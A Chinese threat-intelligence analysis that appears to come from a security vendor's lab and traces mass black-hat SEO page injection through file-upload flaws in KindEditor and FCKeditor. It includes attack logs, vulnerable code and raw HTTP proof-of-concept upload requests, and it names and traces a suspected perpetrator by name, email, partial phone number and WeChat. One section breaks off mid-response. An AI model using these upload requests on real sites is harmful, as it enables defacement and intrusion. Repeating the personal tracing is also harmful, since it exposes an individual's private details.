**作者：SanLorewalker@知道創宇404積極防禦實驗室  **
**原文連結：https://paper.seebug.org/1273/**

### 一、背景

知道創宇威脅情報中心-業務安全輿情監測平臺不斷發現大量網站被植入非法SEO內容頁面，且最近有明顯上升的現象，2020年4月至6月發現了6,802個網站被植入了4,955,586個非法SEO內容頁面，知道創宇404積極防禦實驗室的安全研究員針對該現象了進行了分析、溯源。
	
被非法植入SEO頁面的域名備案省份分佈如下：

![](https://s4.51cto.com/images/blog/202007/24/eece1d7205eb7856463d6664f96ddfaa.gif)
<center>圖 1 非法植入SEO頁面省份分佈圖</center>
其中，企業佔了67%；政府機關、事業單位等國家機構佔比4%，如下圖：

![](https://s4.51cto.com/images/blog/202007/24/48946ac6952f80757fc6f392b40eb9d7.gif)
<center>圖 2 網站性質分佈比例圖</center>

被植入非法SEO頁面的存活統計如下：

![](https://s4.51cto.com/images/blog/202007/24/75f4ed2f28a5d13d26ad0e520df85790.gif)
<center>圖 3 非法SEO頁面存活比例圖</center>

### 二、詳細分析

訪問這些被植入的頁面會自動跳轉到bo彩網站、se情網站。這些頁面透過嵌入大量暗鏈、偽裝成404錯誤頁面、寫入到PDF檔案內容中等多種方法來提高在搜尋引擎中的排名。

#### 1. 非法SEO頁面植入案例

被植入的非法SEO頁面有如下幾種：

![](https://s4.51cto.com/images/blog/202007/24/6823b187fde17c5663867f9b15c312ff.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
<center>圖 4 訪問頁面後跳轉到bo彩網站</center>
![](https://s4.51cto.com/images/blog/202007/24/d5b5f641bdd0677b9ede7c89770a8f90.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
<center>圖 5 頁面內包含大量se情資訊以及暗鏈</center>
![](https://s4.51cto.com/images/blog/202007/24/7c37bff21fe537da794cafe7a8d0d976.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
<center>圖 6 頁面內包大量暗鏈以及非法捏造新聞內容</center>
![](https://s4.51cto.com/images/blog/202007/24/aa6f2bbb6b5e8f6457fc0c1a998b0638.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
<center>圖 7 非法植入傳奇頁面</center>
![](https://s4.51cto.com/images/blog/202007/24/9c14c24df5db430f1a3d6afb38eed531.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
<center>圖 8 在html頭部隱藏植入bo彩資訊和頁面跳轉指令碼</center>

![](https://s4.51cto.com/images/blog/202007/24/6015256065ce96986e4f00a9401431b5.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
<center>圖 9 404頁面偽裝</center>

![](https://s4.51cto.com/images/blog/202007/24/3174c12f39c75643978b8f875faaec91.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
<center>圖 10 直接植入bo彩頁面</center>

![](https://s4.51cto.com/images/blog/202007/24/845875d4046fcc1fa19fafcd60620bca.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
<center>圖 11 將bo彩資訊植入PDF檔案內</center>
![](https://s4.51cto.com/images/blog/202007/24/31fffa553d34ee5c69f320c19c63c334.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
<center>圖 12 搜狗頁面隱藏se情頁面內容</center>

#### 2. 日誌分析

經分析，發現這些網站大部分使用了KindEditor、UEditor和FCKeditor。KindEditor和UEditor在預設配置的情況下允許訪客上傳檔案，FCKeditor在配置不當的情況下會導致訪客任意上傳檔案。

對使用KindEditor的網站日誌分析，政府機構、教育機構、事業單位、企業等網站都存在異常資料流量，其特徵都是訪問不同網站的同一個目錄檔案：
```
www.*.com/kindeditor/*/upload_json.ashx?dir=image
```

以KindEditor為關鍵字，在谷歌搜尋上找到大量的被非法注入的SEO內容的頁面：

![](https://s4.51cto.com/images/blog/202007/24/fec6374a8f85205dd032ce1583d7b5f4.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
<center>圖 13</center>

知道創宇雲安全CDN捕獲到***的上傳請求：
```
2020-06-28 16:53:49	180.104.*.*	POST	www.*.com/e/incs/kindeditor/ashx/upload_json.ashx?dir=image
2020-06-28 17:00:20	106.115.*.*	POST	www.*.com/kindeditor/asp.net/upload_json.ashx?dir=file
2020-06-28 16:59:58	106.115.*.*	POST	www.*.com/kindeditor/asp.net/upload_json.ashx?dir=file
2020-06-28 17:00:07	106.115.*.*	POST	www.*.com/kindeditor/asp.net/upload_json.ashx?dir=file
2020-06-28 16:59:26	106.115.*.*	POST	www.*.com/kindeditor/asp.net/upload_json.ashx?dir=file
2020-06-28 16:59:48	106.115.*.*	POST	www.*.com/kindeditor/asp.net/upload_json.ashx?dir=file
2020-06-28 16:59:52	106.115.*.*	POST	www.*.com/kindeditor/asp.net/upload_json.ashx?dir=file
2020-06-28 16:55:11	180.104.*.*	POST	www.*.com/e/incs/kindeditor/ashx/upload_json.ashx?dir=image
2020-06-28 16:55:30	180.104.*.*	POST	www.*.com/e/incs/kindeditor/ashx/upload_json.ashx?dir=image
2020-06-28 16:58:22	58.216.*.*	POST	www.*.gov.cn/editor/kindeditor/php/upload_json.php?dir=image
2020-06-28 17:24:25	58.216.*.*	POST	www.*.gov.cn/editor/kindeditor/php/upload_json.php?dir=image
2020-06-28 17:00:13	106.115.*.*	POST	www.*.com/kindeditor/asp.net/upload_json.ashx?dir=file
2020-06-28 16:59:45	106.115.*.*	POST	www.*.com/kindeditor/asp.net/upload_json.ashx?dir=file
2020-06-28 17:00:24	106.115.*.*	POST	www.*.com/kindeditor/asp.net/upload_json.ashx?dir=file
2020-06-28 16:59:32	106.115.*.*	POST	www.*.com/kindeditor/asp.net/upload_json.ashx?dir=file
2020-06-28 16:48:53	45.89.*.*	POST	jtj.*.gov.cn/js/kindeditor/jsp/upload_json.jsp?dir=file
2020-06-28 16:59:27	106.115.*.*	POST	www.*.com/kindeditor/asp.net/upload_json.ashx?dir=file
2020-06-28 17:00:04	106.115.*.*	POST	www.*.com/kindeditor/asp.net/upload_json.ashx?dir=file
2020-06-28 16:54:57	223.113.*.*	POST	b2b.*.cn/member/kindeditor/php/upload_json.php?dir=image
2020-06-28 16:44:40	27.38.*.*	POST	b2b.*.cn/member/kindeditor/php/upload_json.php?dir=image
2020-06-28 16:44:24	27.38.*.*	POST	b2b.*.cn/member/kindeditor/php/upload_json.php?dir=image
2020-06-28 16:55:16	223.113.*.*	POST	b2b.*.cn/member/kindeditor/php/upload_json.php?dir=image
2020-06-28 16:55:32	223.113.*.*	POST	b2b.*.cn/member/kindeditor/php/upload_json.php?dir=image
2020-06-28 16:55:50	223.113.*.*	POST	b2b.*.cn/member/kindeditor/php/upload_json.php?dir=image
```

經過統計，80%的非法植入頁面都與KindEditor編輯器有關，並且 KindEditor編輯器的版本號都小於4.1.12。

#### 3. 編輯器漏洞分析
##### 3.1 影響範圍

知道創宇ZoomEye檢索到KindEditor編輯器相關記錄 29,595條、FCKeditor編輯器記錄238,711條、UEditor編輯器記錄 18,648條，如下所示：

![](https://s4.51cto.com/images/blog/202007/24/df2e58e1a9f6f987a63fffa763441acd.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
<center>圖 14 KindEditor編輯器</center>
![](https://s4.51cto.com/images/blog/202007/24/c54ddce0b921c0e21fcb491d0265260f.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
<center>圖 15 FCKeditor編輯器</center>
![](https://s4.51cto.com/images/blog/202007/24/91a85c825ec69a0a6e3f5d347d85682c.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
<center>圖 16 UEditor編輯器</center>
使用ZoomEye網路搜尋引擎快速評估了三種編輯器漏洞的影響範圍，其中UEditor主要省市分佈如下：
![](https://s4.51cto.com/images/blog/202007/24/723ff455c9619c831bc19e438e3a6a88.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)

FCKeditor主要省市分佈如下：
![](https://s4.51cto.com/images/blog/202007/24/b0e8cc064743da2ebbf71b45785449ba.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)

KindEditor主要省市分佈如下：
![](https://s4.51cto.com/images/blog/202007/24/cac2b82e2cf5ac3d1ccff9ddb53e56a5.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)

##### 3.2 KindEditor 編輯器檔案上傳漏洞分析

KindEditor  <  4.1.12 版本存在任意檔案上傳漏洞，檔案`KindEditor/php/upload_json.php`是演示程式，不檢查訪問者的許可權以及內容即可上傳檔案，且很多網站系統沒有刪除該檔案，造成惡意使用者上傳非法內容。`upload_json.php`關鍵程式碼如下所示：

```
/有上傳檔案時
if (empty($_FILES) === false) {
	//原檔名
	$file_name = $_FILES['imgFile']['name'];
	//伺服器上臨時檔名
	$tmp_name = $_FILES['imgFile']['tmp_name'];
	//檔案大小
	$file_size = $_FILES['imgFile']['size'];
	//檢查檔名
	if (!$file_name) {
		alert("請選擇檔案。");
	}
	//檢查目錄
	if (@is_dir($save_path) === false) {
		alert("上傳目錄不存在。");
	}
	//檢查目錄寫許可權
	if (@is_writable($save_path) === false) {
		alert("上傳目錄沒有寫許可權。");
	}
	//檢查是否已上傳
	if (@is_uploaded_file($tmp_name) === false) {
		alert("上傳失敗。");
	}
	//檢查檔案大小
	if ($file_size > $max_size) {
		alert("上傳檔案大小超過限制。");
	}
	//檢查目錄名
	$dir_name = empty($_GET['dir']) ? 'image' : trim($_GET['dir']);
	if (empty($ext_arr[$dir_name])) {
		alert("目錄名不正確。");
	}
	//獲得副檔名
	$temp_arr = explode(".", $file_name);
	$file_ext = array_pop($temp_arr);
	$file_ext = trim($file_ext);
	$file_ext = strtolower($file_ext);
	//檢查副檔名
	if (in_array($file_ext, $ext_arr[$dir_name]) === false) {
		alert("上傳副檔名是不允許的副檔名。\n只允許" . implode(",", $ext_arr[$dir_name]) . "格式。");
	}
	//建立資料夾
	if ($dir_name !== '') {
		$save_path .= $dir_name . "/";
		$save_url .= $dir_name . "/";
		if (!file_exists($save_path)) {
			mkdir($save_path);
		}
	}
	$ymd = date("Ymd");
	$save_path .= $ymd . "/";
	$save_url .= $ymd . "/";
	if (!file_exists($save_path)) {
		mkdir($save_path);
	}
	//新檔名
	$new_file_name = date("YmdHis") . '_' . rand(10000, 99999) . '.' . $file_ext;
	//移動檔案
	$file_path = $save_path . $new_file_name;
	if (move_uploaded_file($tmp_name, $file_path) === false) {
		alert("上傳檔案失敗。");
	}
	@chmod($file_path, 0644);
	$file_url = $save_url . $new_file_name;

header('Content-type: text/html; charset=UTF-8');
	$json = new Services_JSON();
	echo $json->encode(array('error' => 0, 'url' => $file_url));
	exit;
}
```

POC如下:

```
POST /asp/upload_json.asp?dir=file HTTP/1.1
Host: www.*.com
User-Agent: curl/7.64.1
Accept: */*
Content-Length: 80432
Content-Type: multipart/form-data; boundary=------------------------9f9be5bc74ffdc89
Expect: 100-continue

HTTP/1.1 200 OK
Date: Thu, 09 Jul 2020 05:26:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 85
Connection: keep-alive
Cache-Control: private
Set-Cookie: ASPSESSIONIDSCQCSSTQ=HCFCPMPCKGEKEBLLNIBOJOBL; path=/
X-Via-JSL: 9f68ad3,-
Set-Cookie: __jsluid_h=735a5857c6600e858cbf1e17cbf444f3; max-age=31536000; path=/; HttpOnly
X-Cache: bypass

{"error":0,"url":"\/asp\/..\/company\/upimages\/20200709\/20200709132665736573.html"}
```

##### 3.3 FCKeditor 編輯器檔案上傳漏洞分析

PHP 版本 <= 2.4.2 在處理PHP 上傳的地方並未對使用者進行上傳檔案型別的控制，導致使用者上傳任意檔案。

透過測試分析，發現上傳檔案的介面：
```
www.*.com/gedo/mambots/editors/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/
```

關鍵引數有：Command、Type和CurrentFolder。

首先在原始碼中，查詢Command、Type和CurrentFolder三個引數相關的程式碼：
```
	$sCommand		= $_GET['Command'] ;
	$sResourceType	= $_GET['Type'] ;
	$sCurrentFolder	= $_GET['CurrentFolder'] ;
```
sCommand變數，當該變數值為“FileUpload”時，會透過FileUpload函式處理：
```
	if ( $sCommand == 'FileUpload' )
	{
		FileUpload( $sResourceType, $sCurrentFolder ) ;
		return ;
	}
```
FileUpload（位於commands.php）只是簡單的對檔案字尾名做了黑名單限制：
```
$arDenied	= $Config['DeniedExtensions'][$resourceType] ;
```
未對非法內容進行過濾，也沒有進行許可權限制，就可以利用這一點進行非法SEO內容上傳。

POC如下：
```
POST /gedo/mambots/editors/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1
Host: www.*.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------29373750073747171394011132748
Content-Length: 325
Origin: http://www.*.com
Connection: close
Referer: http://www.*.com/gedo/mambots/editors/fckeditor/editor/filemanager/browser/default/frmupload.html
Upgrade-Insecure-Requests: 1

-----------------------------29373750073747171394011132748
Content-Disposition: form-data; name="NewFile"; filename="testtest.html"
Content-Type: text/html

<title>test title</title>

-----------------------------29373750073747171394011132748--

HTTP/1.1 200 OK
Date: Fri, 10 Jul 2020 02:18:42 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 112

</p><center>圖 17</center>
www.ikaidian.net/404.js的內容截圖如下：

![](https://s4.51cto.com/images/blog/202007/24/f9b6c846a937af32afff997861c56a95.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
<center>圖 18</center>
繼續開啟，裡面藏著一個賬號：E-mail:fa885168@gmail.com

![](https://s4.51cto.com/images/blog/202007/24/59f04b16f882289f963c7c8bdef94fac.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
<center>圖 19</center>
用谷歌搜尋，所有結果都是se情頁面，佈局格式和上文找到植入非法SEO內容一致：

![](https://s4.51cto.com/images/blog/202007/24/47f72bf91628bdb70ae9bb9eb75089dc.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
<center>圖 20</center>

必應搜尋結果如下所示：

![](https://s4.51cto.com/images/blog/202007/24/fa8bd5ff7d59f3909dd9d42f19d34d66.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
<center>圖 21</center>
點進網頁，搜尋原始碼，發現一段有效資訊：

![](https://s4.51cto.com/images/blog/202007/24/fef9219296f9aaf7adc2f9fb626d8a0f.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
<center>圖 22</center>
有效資訊如下：
```
Name: facai chen
Street: guangdongshengzhongshanshizhongshanjie
Postal Code: 528400
Phone: +86.1317****648
Email: fa885168@gmail.com
```

郵編與街道相符，手機號為山東濱州聯通的電話號碼。

微信查詢手機號，疑似***的微信：

![](https://s4.51cto.com/images/blog/202007/24/4c20cc64524fc94f16732ff59cd10617.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
<center>圖 23</center>

微信頭像疑似為本人照片：
![](https://s4.51cto.com/images/blog/202007/24/0b5778a535e6d6ad073eeb71ca9d8e23.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_90,type_ZmFuZ3poZW5naGVpdGk=)
<center>圖 24</center>
根據追溯結果顯示，該漏洞已被國內黑產人員大批次自動化利用。
**預防漏洞，保護企業安全，請點選“[知道創宇]**(https://www.yunaq.com/?from=sitpub00717)”

溯源黑帽利用 Web 編輯器漏洞非法植入 SEO 頁面事件

相關文章